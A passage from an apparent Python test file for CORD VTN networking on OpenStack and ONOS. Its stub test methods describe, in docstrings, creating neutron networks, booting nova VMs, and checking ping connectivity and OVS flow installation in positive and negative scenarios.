3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping to the VM from compute node network which are launched a VM.
8) verify that ping is successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_vlan_connectivity_network_and_boot_image_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a vlan port-create.
(neutron port-create net-A-private --name stag-100).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping to the VM from compute node network which are launched a VM.
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_floating_IP_with_vlan_connectivity_network_and_boot_image_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a floating ip and vlan port-create.
(neutron port-create net-A-private --name stag-500).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Now ping to the VM from compute node network which are launched a VM.
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_vlan_interface_private_network_and_boot_image_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
4) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Create a virtual interface with vlan tag and private ip on VM.
8) Create a same virtual interface with valn tag and private ip on head node.
9) Now ping to the VM from head node network which are launched a openstack service.
10) verify that ping is successful
11) Verify that flow is being added in ovs-switch in compute-node.
12) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
13) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_vlan_interface_public_network_and_boot_image_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as public network.
(neutron net-create net-A-public, neutron subnet-create net-A-public 198.0.0.0/24).
4) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Create a virtual interface with vlan tag and public ip on VM.
8) Create a same virtual interface with valn tag and any pulic ip on head node.
9) Now ping to the VM from head node network which are launched a openstack service.
10) verify that ping is successful
11) Verify that flow is being added in ovs-switch in compute-node.
12) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
13) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_vlan_interface_local_management_network_and_boot_image_connectivity(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Create a virtual interface with vlan tag and local management ip on VM.
8) Create a same virtual interface with valn tag and any local management ip on head node.
9) Now ping to the VM from head node network which are launched a openstack service.
10) verify that ping is successful
11) Verify that flow is being added in ovs-switch in compute-node.
12) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
13) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_vlan_interface_floating_private_network_and_boot_image_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
4) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Create a virtual interface with vlan tag and private floating ip on VM.
8) Create a same virtual interface with valn tag and private floating ip on head node.
9) Now ping to the VM from head node network which are launched a openstack service.
10) verify that ping is successful
11) Verify that flow is being added in ovs-switch in compute-node.
12) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
13) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_vlan_interface_floating_public_network_and_boot_image_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as public network.
(neutron net-create net-A-public, neutron subnet-create net-A-public 198.0.0.0/24).
4) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Create a virtual interface with vlan tag and public floating ip on VM.
8) Create a same virtual interface with valn tag and any pulic floating ip on head node.
9) Now ping to the VM from head node network which are launched a openstack service.
10) verify that ping is successful
11) Verify that flow is being added in ovs-switch in compute-node.
12) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
13) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_vlan_interface_floating_local_management_network_and_boot_image_connectivity(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Create a virtual interface with vlan tag and local management floating ip on VM.
8) Create a same virtual interface with valn tag and any local management floating ip on head node.
9) Now ping to the VM from head node network which are launched a openstack service.
10) verify that ping is successful
11) Verify that flow is being added in ovs-switch in compute-node.
12) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
13) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_one_virtual_public_and_a_private_network_and_boot_2_images_in_same_service_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as public network.
(neutron net-create net-A-public, neutron subnet-create net-A-public 198.0.0.0/24).
4) Now boot 2 images in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in the private network
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_one_virtual_local_management_and_a_private_network_and_boot_2_images_in_same_service_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot two images in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in the private network
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_one_virtual_vlan_connectivity_and_a_private_network_and_boot_2_images_in_same_service_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a vlan port-create.
(neutron port-create net-A-private --name stag-100).
4) Now boot two images in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in the private network
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_one_virtual_floating_IP_with_vlan_connectivity_and_a_private_network_and_boot_2_images_in_same_service_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a floating ip and vlan port-create.
(neutron port-create net-A-private --name stag-500).
4) Now boot two images in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in the private network
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_one_virtual_local_management_other_public_network_and_boot_2_images_in_same_service_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot two images in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in the public network
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_one_virtual_vlan_connectivity_and_a_private_network_and_boot_2_images_in_same_service_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a vlan port-create.
(neutron port-create net-A-private --name stag-100).
4) Now boot two images in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in the public network
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_one_virtual_floating_IP_with_vlan_connectivity_and_a_private_network_and_boot_2_images_in_same_service_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a floating ip and vlan port-create.
(neutron port-create net-A-private --name stag-500).
4) Now boot two images in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in the public network
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_one_virtual_vlan_connectivity_other_local_management_network_and_boot_2_images_in_same_service_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a vlan port-create.
(neutron port-create net-A-private --name stag-100).
4) Now boot two images in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in the public network
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_one_virtual_floating_IP_with_vlan_connectivity_other_local_management_network_and_boot_2_images_in_same_service_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a floating ip and vlan port-create.
(neutron port-create net-A-private --name stag-500).
4) Now boot two images in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in the public network
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_one_virtual_floating_IP_with_vlan_connectivity_other_virtual_vlan_network_and_boot_2_images_in_same_service_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a floating ip and vlan port-create.
(neutron port-create net-A-private --name stag-500).
4) Now boot two images in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in the public network
8) verify that ping is not successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_public_network_and_boot_2_images_with_invalid_public_field_of_onos_network_cfg_json_in_same_service(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) Push network_cfg.json config file to onos with an invalid public gateway ip in network_cfg.json file.
4) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as public network.
(neutron net-create net-A-public, neutron subnet-create net-A-public 198.0.0.0/24).
5) Now boot 2 images in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-02
6) Wait till VMs boot up and running.
7) Verify that two VMs are launched and running by using novaclient python API.
8) Verify that flow is being added in ovs-switch in compute-node.
9) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
10) Verify that cord-onos pushed flows to OVS switch.
11) Verify ping from VM to public gateway which is send to ONOS through rest API in network_cfg.json file.
12) 11th step should be failed due to we are passing invalid public IP as gatway and we have not seen any flows in OVS for it.
13) Now ping one VM to other VM it should not ping again even it in the same service.
"""
pass
def test_cordvtn_creating_virtual_local_management_network_and_boot_image_with_invalid_localManagementIp_field_of_onos_network_cfg_json(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) Push network_cfg.json config file to onos with an invalid localManagement ip in network_cfg.json file.
4) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
5) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
6) Wait till VM boots up and starts running.
7) Verify that a VM is launched and running by using novaclient python API.
8) Verify that flow is being added in ovs-switch in compute-node.
9) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
10) Verify that cord-onos pushed flows to OVS switch.
11) Verify ping from VM to local management ip which is send to ONOS through rest API in network_cfg.json file.
12) 11th step should be failed due to we are passing invalid local management IP and we have not seen any flows in OVS for it.
"""
pass
def test_cordvtn_creating_virtual_private_network_and_boot_image_with_invalid_OVSDB_port_field_of_onos_network_cfg_json(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) Push network_cfg.json config file to onos with an invalid ovsdb port in network_cfg.json file.
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
4) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Verify that flows are being added in ovs-switch in compute-node.
8) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
9) Verify that cord-onos did not push any flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_private_network_and_boot_image_with_invalid_OpenStack_details_in_onos_network_cfg_json(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) Push network_cfg.json config file to onos with an invalid openstack in network_cfg.json file.
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
4) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Verify that no flows are being added in ovs-switch in compute-node.
8) Verify that onos-ml2 plugin is not being received a message from openstack service neutron.
9) Verify that cord-onos did not push any flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_private_network_and_boot_image_with_invalid_compute_node_details_in_onos_network_cfg_json(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) Push network_cfg.json config file to onos with an invalid compute node details in network_cfg.json file.
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
4) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Verify that no flows are being added in ovs-switch in compute-node.
8) Verify that onos-ml2 plugin is not being received a message from openstack service neutron.
9) Verify that cord-onos did not push any flows to OVS switch.
"""
pass
def test_cordvtn_creating_two_virtual_private_networks_and_boot_images_in_different_services_connectivity(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create two networks with name - NetA and NetB with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
(neutron net-create net-B-private, neutron subnet-create net-B-private 10.1.0.0/24).
4) Now boot 2 images in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-B-vm-01
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Verify that flow is being added in ovs-switch in compute-node.
8) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
9) Verify that cord-onos pushed flows to OVS switch.
10) Now ping from VM which is Net-A to other VM which is in Net-B, should not ping.
11) Verify that no flows are being added in the OVS switch.
"""
pass
def test_cordvtn_creating_two_virtual_public_networks_and_boot_images_in_different_service_connectivity(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create two networks with name - NetA and NetB with an IP as public network.
(neutron net-create net-A-public, neutron subnet-create net-A-public 198.0.0.0/24).
(neutron net-create net-A-public, neutron subnet-create net-B-public 198.1.0.0/24).
4) Now boot 2 images in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-B-vm-01
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Verify that flow is being added in ovs-switch in compute-node.
8) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
9) Verify that cord-onos pushed flows to OVS switch.
10) Now ping from VM which is Net-A to other VM which is in Net-B, should not ping.
11) Verify that no flows are being added in the OVS switch.
"""
pass
def test_cordvtn_creating_two_virtual_local_management_networks_and_boot_images_in_different_service_connectivity(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create two networks with name - NetA and NetB with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.28.0.0/24 -gateway 172.28.0.1).
4) Now boot two images in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-B-vm-01
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Verify that flow is being added in ovs-switch in compute-node.
8) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
9) Verify that cord-onos pushed flows to OVS switch.
10) Now ping from VM which is Net-A to other VM which is in Net-B, should not ping.
11) Verify that no flows are being added in the OVS switch.
"""
pass
def test_cordvtn_creating_two_virtual_vlan_connectivity_networks_and_boot_images_in_different_service_connectivity(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create two networks with name - NetA and NetB with a vlan port-create.
(neutron port-create net-A-private --name stag-100).
(neutron port-create net-B-private --name stag-200).
4) Now boot two images in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg1-01
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Verify that flow is being added in ovs-switch in compute-node.
